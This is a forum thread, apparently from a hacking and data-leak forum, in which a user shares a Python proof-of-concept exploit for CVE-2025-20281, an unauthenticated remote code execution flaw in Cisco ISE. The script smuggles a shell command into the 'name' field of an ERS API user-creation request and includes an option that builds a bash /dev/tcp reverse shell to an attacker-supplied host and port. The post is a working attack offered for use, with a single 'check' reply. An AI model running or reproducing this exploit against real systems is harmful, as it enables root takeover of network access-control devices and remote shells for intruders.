Cisco ISE - Unauthenticated RCE
by antisocial - Saturday July 26, 2025 at 08:21 AM
Anti-Social Personality Disorder
user_241035
Posts: 70
Threads: 22
Joined: Jul 2024
Reputation: 624

LeakerGOD GifterHackerGamer
#1
07-26-2025, 08:21 AM
Thought i would share this since its really not that talked about but still pretty interesting, if you have anything you want to add please do so : )

Vulnerability description:
"A vulnerability in a specific API of Cisco ISE and Cisco ISE-PIC could allow an unauthenticated, remote attacker to execute arbitrary code on the underlying operating system as root. The attacker does not require any valid credentials to exploit this vulnerability. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by submitting a crafted API request. A successful exploit could allow the attacker to obtain root privileges on an affected device."

Articles:
https://thehackernews.com/2025/07/critic...ified.html
https://www.theregister.com/2025/06/26/p...fixes_two/
https://www.securityweek.com/critical-ci...execution/
https://www.bleepingcomputer.com/news/se...es-engine/
https://thehackernews.com/2025/06/critic...d-ise.html
https://securityaffairs.com/179362/secur...l-rce.html
[*]
#!/usr/bin/env python3
import requests
import urllib3
import argparse
urllib3.disable_warnings()
def exploit_cve_2025_20281_unauth(target, cmd):
    url = f"https://{target}:9060/ers/sdk#_"
    #url = f"https://{target}/ers/sdk#_"
    payload = {
        "InternalUser": {
            "name": f"pwn; {cmd}; #",
            "password": "x",        # dummy, ignored by vuln
            "changePassword": False
        }
    }
    r = requests.post(url, json=payload, verify=False)
    print(f"[+] HTTP {r.status_code}\n{r.text}\n")
def build_reverse_shell(lhost, lport):
    return f"/bin/bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"
if __name__ == '__main__':
    parser = argparse.ArgumentParser(
        description="Unauthenticated PoC for CVE-2025-20281 on Cisco ISE ERS"
    )
    parser.add_argument('target', help="IP or hostname of the ISE PAN")
    group = parser.add_mutually_exclusive_group(required=True)
    group.add_argument(
        '--whoami',
        action='store_true',
        help="Run 'whoami' and print the result"
    )
    group.add_argument(
        '--reverse',
        nargs=2,
        metavar=('LHOST', 'LPORT'),
        help="Spawn a bash reverse shell to LHOST:LPORT"
    )
    args = parser.parse_args()
    if args.whoami:
        cmd = 'whoami'
    else:
        lhost, lport = args.reverse
        cmd = build_reverse_shell(lhost, lport)
    print(f"
Target: {args.target}")
    print(f"
Command: {cmd}\n")
    exploit_cve_2025_20281_unauth(args.target, cmd)
 
PGP
PGP ARCHIVE
contact: i@hateje.ws
Reply
Breached
Member
Posts: 30
Threads: 3
Joined: Jan 2025
Reputation: 0
#2
07-29-2025, 06:50 AM
check check check
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  CVE-2025-53770 - Microsoft Sharepoint Unauthenticated RCE antisocial 1 173 07-28-2025, 10:50 AM
Last Post: Krypt3d4ng3l
  IngressNightmare unauthenticated RCE PoC azamii 7 467 04-14-2025, 11:02 PM
Last Post: rainsec
  Dokan Pro Unauthenticated SQL Injection POC | CVSS 10 Loki 35 3,115 04-07-2025, 02:00 PM
Last Post: gagoatk
  Craft CMS 4.4.14 - Unauthenticated Remote Code Execution Loki 13 1,068 04-06-2025, 10:05 PM
Last Post: cobrinha
  POC: PayPlus Payment Gateway < 6.6.9 - Unauthenticated SQLi Loki 15 1,815 01-27-2025, 01:59 AM
Last Post: devgsp

Forum Jump:


 Users browsing this thread: 1 Guest(s)